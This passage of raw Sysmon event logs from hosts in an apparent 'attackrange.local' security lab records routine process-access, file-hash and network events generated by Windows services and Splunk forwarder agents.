12:21:39.050{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439625Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:39.050{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291087Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:40.453{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E059F49813938A12A38C0F2FEA2BC753,SHA256=B50CD308B66F355F352F8CE66D53E8A8990CD89D2C96ED39BFCC1FBE89B85227,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439630Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:40.089{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B48454134B6DCAFDA827A12606BB7724,SHA256=3BF9DF6144F17B264C74699D04C0C82487F70EF1DD61FE259D3FD10B1060AAFE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439629Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:40.051{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439628Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:40.051{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291088Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:41.455{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DB1ABFF7B16741AFCF607C004F4CD8B,SHA256=04EEE627D66F2540C9366D4C8741256ED11FD06EAFD448EAABD49859BB5D289B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439635Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:41.294{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=284227B66B09507C2C548A0172DB62D3,SHA256=9D1FC05492A360A0E8EA699DB71DE8C7517329D4FB35C76EE687923B9EF01514,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000439634Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:38.519{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-932.attackrange.local49980- 23542300x8000000000000000439633Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:41.103{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB76A4FCC3611C8B16BF118768A19AD2,SHA256=242FE54D06EBCC9DF42094348791B98B4F62685F4A626D3DA75D2C6C54ACCB0F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439632Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:41.052{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439631Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:41.052{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291089Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:42.473{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6A7FFEEA676CAF98F0C88EBA933916D,SHA256=8D3FA5B3D6CC666636F0C8E4D45591C79E4A27F50B0F978D436A778F2A5D2961,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439638Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:42.109{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2736BD35104112635FC5917E88C117CC,SHA256=BAEAB5C0BE9EC1E4DA60A5C4161FA3A1B522D307A01832EB8E3489CDD4D50F72,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439637Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:42.053{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439636Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:42.053{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291090Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:43.475{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4C4D60CDB76BE00CF9426DA44C1046F,SHA256=C93B6388937A79D8ADB3CEF53595A8A547BDB66A43826DEDA82F1AB23EFE9BDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439642Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:43.139{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EDB4B62344774568194232EB523D12E,SHA256=1858D92B14FA9D4E543A5557ED6A0354703BB1B7F3904A9FE5480AB71E2F1E2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439641Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:43.096{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CEA6C8AF2F585100B2FF3C0693A51CC5,SHA256=A73880BB75907E588EAB19DAB334CB0CA13F13B3FA3A58E0F6936135FAC4663D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439640Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:43.054{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439639Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:43.054{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291093Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:44.515{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1776A9CB559121D27E0BF2BF5B283FE6,SHA256=1A3703DE24BEE7631F03222A5A4D89D4EF9262B1BAB2348CFE1347356CA1AC25,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000439646Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:40.510{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62370-false10.0.1.12-8000- 23542300x8000000000000000439645Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:44.143{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF9F02BA4AC66065AB39C1D844B7485D,SHA256=53F33DB8073DCE859DCDA1E583FFD8C6CD00CB08B9212F4E4277FF847CA5FC16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291092Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:44.130{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F597F6AC75FAEF395A4028F724E74C0B,SHA256=4669C4FBE126004A7BB4C1FB2864CC66F0A65093672B083F74FBDDDFFCF56705,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291091Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:44.130{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C7F933314535AB2C4450A1B22A81ADD5,SHA256=17C81974BCCCF0B0808CB76D4FEE7487CFBCA9E2210850022E6359CC6984D336,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439644Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:44.055{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439643Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:44.055{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291095Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:45.549{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2FCE1070D3EE86C474BE3FB342F21EDD,SHA256=C260D05BD22C195C10CE41E916AF1AABD7000EBF73F7B1A0A8A1204B4E1F7A53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000439649Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:45.356{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78C7BB3F441D8FED55504B041D646EAB,SHA256=C1CA9F7355B5BCA99657E8F9B170488F41F066D02918227A8DC8C5F371E7B108,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000291094Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:42.386{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50591-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 10341000x8000000000000000439648Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:45.055{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439647Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:45.055{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000291096Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:21:46.551{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FEE69128B6F04BE8D9914BAB14E2946,SHA256=D266AD9C05440AB8033FB6ACF7188F7090A1FF606CFC7BD03E33A5249E27EF20,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000439679Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.872{42DC5269-CF3C-6086-AE00-00000000BA01}21884056C:\Windows\system32\conhost.exe{42DC5269-01DA-6088-AD28-00000000BA01}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439678Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.871{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439677Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.871{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439676Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.871{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439675Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:21:46.871{42DC5269-CE98-6086-0C00-00000000BA01}8403440C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000439674Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 